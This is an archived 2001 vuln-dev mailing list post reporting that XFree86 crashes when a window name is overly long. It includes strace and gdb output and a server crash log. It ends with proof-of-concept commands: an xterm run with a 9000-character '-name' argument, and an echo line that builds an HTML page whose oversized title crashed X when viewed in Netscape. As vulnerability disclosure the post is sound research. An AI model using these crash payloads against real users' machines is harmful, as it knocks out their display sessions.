XFree86 DOS / Buffer overflow local and remote.

From: KF (dotslash@snosoft.com)
Date: 09/23/01 

Message-ID: <3BAD957A.4000102@snosoft.com>
Date: Sun, 23 Sep 2001 03:55:38 -0400
From: KF <dotslash@snosoft.com>
To: vuln-dev <vuln-dev@security-focus.com>
Subject: XFree86 DOS / Buffer overflow local and remote.

I gzipped the html attachment because the list rejected the html mime type.
-KF

While playing with the WindowMaker title overflow I noticed the following...I have tested this while running KDE
and while running plain vanilla xwindows with no window manager. The first time I was in WindowMaker and of
course it segfaulted also. This seems to work on Mandrake 8.0 ppc but not on my Mandrake 7.2 i586.

I was trying to exploit the WindowMaker overflow using xterm -name <long string here>. Instead I ended
up crashing X all together.

This is the end of an strace of the WindowMaker wmaker executable with the PID of 2003
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAA: fatal IO error 32 (Broken pipe) or KillClient on X server "localhost:0.0"
[1]+ Done strace -o wmaker.strace -ivfp 2003

Heres the end of the message dumped to my screen when I typed startx from my bash prompt.

(**) Mouse1: Core Pointer
(==) Mouse1: Buttons: 3
(**) Mouse1: Emulate3Buttons, Emulate3Timeout: 50
(II) Keyboard "Keyboard1" handled by legacy driver
(II) XINPUT: Adding extended input device "Mouse1" (type: MOUSE)

Fatal server error:
Caught signal 11. Server aborting

When reporting a problem related to a server crash, please send
the full server output, not just the last messages.
This can be found in the log file "/var/log/XFree86.0.log".
Please report problems to xfree86@xfree86.org.

xinit: connection to X server lost.

The first few lines of the core file lead me to believe I was crashing X rather than wmaker.

strings core
CORE
CORE
/etc/X11/X :0 -auth /root/.Xauthority -deferglyphs 16

I ran gdb on the xterm program to make sure I wasnt overflowing the xterm -name paramater.

(gdb) run -display localhost:0 -name `perl -e 'print "A" x 9000'`
Starting program: /usr/X11R6/bin/xterm -display localhost:0 -name `perl -e 'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program exited normally.

As you can see it exited as normal. From the strace below we can see the /etc/X11/X segment faults for some reason.

2760 [0fe987d8] read(14, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 6316) = 6316
2760 [0fe987d8] read(14, "8A\0\4\0\340\0\273\0\10\0\0\0\0\0\0008A\0\4\0\340\0\340"..., 9088) = 2064
2760 [0fe71514] gettimeofday({1001226845, 554528}, NULL) = 0
2760 [0fe71514] gettimeofday({1001226845, 556127}, NULL) = 0
2760 [10162b24] --- SIGSEGV (Segmentation fault) ---
2760 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV], SA_RESTART}, 8) = 0
2760 [0fe091b0] --- SIGALRM (Alarm clock) ---
2760 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(0, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(2, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(0, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe987e8] write(2, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(0, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(2, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(0, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(2, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(0, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe9a008] unlink("/tmp/.X0-lock") = 0

The following seemed to do the trick when viewed with netscape... I had to click the x in the corner of the window
to exit netscape before it crashed...either that or it just took a sec.

echo "<HEAD><TITLE>"`perl -e 'print "A" x 9000'`"</HEAD></TITLE>" > file.html

since you can put this html on any web page I suppose that makes this issue remote also.

-KF

Quantcast